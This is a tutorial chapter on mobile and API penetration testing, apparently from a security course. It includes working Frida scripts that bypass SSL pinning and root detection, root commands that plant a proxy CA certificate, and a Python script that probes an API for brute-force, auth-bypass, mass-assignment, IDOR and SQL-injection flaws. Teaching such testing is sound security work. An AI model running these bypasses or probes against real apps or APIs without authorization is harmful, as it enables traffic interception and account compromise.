Mobile & API Pentesting
🔥 Vibe Prompt
"Pentest a mobile app: intercept traffic, bypass SSL, root detection, API testing."
Mobile Setup
```bash
# Android: Burp Suite proxy
# 1. Set Wi-Fi proxy to Burp (192.168.1.X:8080)
# 2. Install the Burp CA cert into the system store (apps on Android 7+ ignore user-added CAs).
#    Android expects a PEM file named by the subject hash, so convert Burp's DER export first:
openssl x509 -inform DER -in burp-ca.der -out burp-ca.pem
openssl x509 -inform PEM -in burp-ca.pem -subject_hash_old -noout   # should print 9a5ba575, the filename used below
adb push burp-ca.pem /sdcard/
# /system is mounted read-only; remount it before copying (needs root)
adb shell "su -c 'mount -o remount,rw /system && cp /sdcard/burp-ca.pem /system/etc/security/cacerts/9a5ba575.0 && chmod 644 /system/etc/security/cacerts/9a5ba575.0'"

# iOS: Proxy with QProxy
# 1. Install QProxy from Cydia
# 2. Set proxy to Burp
# 3. Install Burp CA (Settings → Profile)

# Bypass SSL pinning (Android)
# Use Frida: frida -U -f com.target.app -l ssl_bypass.js
```
Frida SSL Bypass
```javascript
// ssl_bypass.js
Java.perform(function () {
    // checkClientTrusted/checkServerTrusted/getAcceptedIssuers are declared on
    // X509TrustManager; TrustManager is only a marker interface, so implement the former.
    var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
    var TrustAll = Java.registerClass({
        name: 'com.example.TrustAll',
        implements: [X509TrustManager],
        methods: {
            checkClientTrusted: function (chain, authType) {},
            checkServerTrusted: function (chain, authType) {},
            getAcceptedIssuers: function () { return []; }
        }
    });
    var TrustManagers = [TrustAll.$new()];

    var SSLContext = Java.use('javax.net.ssl.SSLContext');
    var SSLContext_init = SSLContext.init.overload(
        '[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom');
    // Keep a reference to the original overload and call it with the trust manager swapped in
    SSLContext_init.implementation = function (keyManagers, trustManagers, secureRandom) {
        SSLContext_init.call(this, keyManagers, TrustManagers, secureRandom);
    };
    // Caveat: this only covers pinning that goes through SSLContext/TrustManager;
    // libraries with their own pinning logic are not affected by this hook.
    console.log('SSL pinning bypassed (SSLContext.init hooked)');
});
```
Run: `frida -U -f com.target.app -l ssl_bypass.js`
Root Detection Bypass
```javascript
// root_bypass.js
Java.perform(function () {
    // Method 1: Hook the RootBeer library's check (only present if the app bundles RootBeer;
    // Java.use throws otherwise, so guard it so Method 2 still installs)
    try {
        var RootBeer = Java.use('com.scottyab.rootbeer.RootBeer');
        RootBeer.isRooted.implementation = function () { return false; };
    } catch (e) {
        console.log('RootBeer not found in this app: ' + e);
    }

    // Method 2: Hide root artefacts from java.io.File.exists()
    var File = Java.use('java.io.File');
    File.exists.implementation = function () {
        var path = this.getPath();  // Frida returns java.lang.String results as JS strings
        // Note: substring matching on "su" also hides unrelated paths (e.g. ".../result");
        // narrow the match to the file name if the app misbehaves.
        if (path.includes('su') || path.includes('magisk')) {
            return false;
        }
        return this.exists();  // falls through to the original implementation
    };
    console.log('Root detection bypassed!');
});
```
API Security Testing
```python
import requests

BASE = "https://api.target.com/v1"
TOKEN = "<session token of a low-privilege test account>"  # placeholder, set before running
AUTH = {"Authorization": f"Bearer {TOKEN}"}


def test_api():
    findings = []

    # 1. Rate limiting: repeated failed logins should eventually be answered with 429
    for i in range(100):
        r = requests.post(f"{BASE}/login", json={"user": "admin", "pass": "wrong"})
        if r.status_code == 429:
            break
    else:
        findings.append("No rate limiting on login (100 failed attempts, never got 429)!")

    # 2. Auth bypass: a bogus bearer token must not reach a privileged endpoint
    r = requests.get(f"{BASE}/admin/users", headers={"Authorization": "Bearer invalid"})
    if r.status_code == 200:
        findings.append("Auth bypass: /admin/users served with an invalid token!")

    # 3. Mass assignment: the extra "role" field should be ignored or rejected.
    #    Re-read the profile rather than trusting the 200 alone.
    r = requests.put(f"{BASE}/user/profile", json={"name": "test", "role": "admin"}, headers=AUTH)
    if r.status_code == 200:
        profile = requests.get(f"{BASE}/user/profile", headers=AUTH).json()
        if profile.get("role") == "admin":
            findings.append("Mass assignment: role updated to admin!")

    # 4. IDOR: another user's orders must not be readable with our token.
    #    Check both status codes before parsing JSON.
    r1 = requests.get(f"{BASE}/orders/1", headers=AUTH)
    r2 = requests.get(f"{BASE}/orders/2", headers=AUTH)
    if r1.status_code == 200 and r2.status_code == 200:
        if r1.json().get("user_id") != r2.json().get("user_id"):
            findings.append("IDOR: can access another user's orders!")

    # 5. Injection: compare against a harmless baseline query; a 200 with results
    #    on the tautology alone is only a weak indicator. Let requests URL-encode the value.
    baseline = requests.get(f"{BASE}/search", params={"q": "zzzz-no-such-item"})
    r = requests.get(f"{BASE}/search", params={"q": "' OR 1=1--"})
    if r.status_code == 200 and len(r.json()) > len(baseline.json() or []):
        findings.append("Possible SQL injection in search (more rows than baseline)!")
    return findings


if __name__ == "__main__":
    for f in test_api():
        print(f"⚠️ {f}")
```
Mobile Pentesting Checklist
| Check | Android | iOS |
|-------|---------|-----|
| Traffic interception | Burp proxy + CA cert | QProxy + CA cert |
| SSL pinning bypass | Frida | Frida / SSL Kill Switch 2 |
| Root/jailbreak detect | RootBeer hook | AntiSubstrateCrack |
| Insecure storage | SharedPrefs, SQLite | Keychain, Plist |
| Hardcoded secrets | APK decompile | IPA decompile |
| App clipping | Intent sniffing | URL scheme hijack |
| Emulator detection | Build fingerprint | Model check |
Tools
| Tool | Purpose |
|------|---------|
| Frida | Runtime manipulation |
| Objection | Mobile exploration |
| APKTool | APK decompile |
| MobSF | Static/dynamic analysis |
| Drozer | Android security audit |
| Radare2 | Binary analysis |
| Hopper | iOS disassembler |
Best Practices
- Always test on a real device (emulator detection is common)
- Use Frida for runtime bypasses
- Decompile the APK/IPA to look for hardcoded secrets
- Test the API and the mobile app together
- Check for insecure data storage
- Verify rate limiting on all endpoints
- Test app clipping / intent hijacking
Mobile Security: The Neglected Attack Surface
Many developers focus only on web security and overlook the mobile app, which is a larger attack surface: the app is installed on the user's phone, where an attacker can decompile it, intercept its traffic, and analyse its local storage.
Key Points of Mobile Penetration Testing
| Test item | What to check | Common vulnerabilities |
|:--------|:--------|:--------|
| Local storage | SharedPreferences, SQLite | API keys or tokens stored in plaintext |
| SSL pinning | HTTPS certificate pinning | No pinning, so traffic can be intercepted by a man-in-the-middle |
| Decompilation | ProGuard/DexGuard obfuscation | Unobfuscated code exposes business logic |
| Deep links | URL scheme handling | Can be triggered maliciously by other apps |
| WebView | JavaScript bridge | XSS leading to local command execution |
Key Points of API Penetration Testing
| Test item | Common vulnerabilities |
|:--------|:--------|
| Authentication bypass | JWT signature not verified, replayable tokens |
| Rate limiting | No rate limit, allowing brute force |
| GraphQL injection | Deeply nested queries causing DoS |
| IDOR | Changing an ID grants access to other users' data |
Next Chapter Preview: Penetration Test Reports
This is the final hands-on chapter. You have learned how to find vulnerabilities; next you will learn how to write a professional penetration test report, turning technical findings into language that clients and development teams can understand.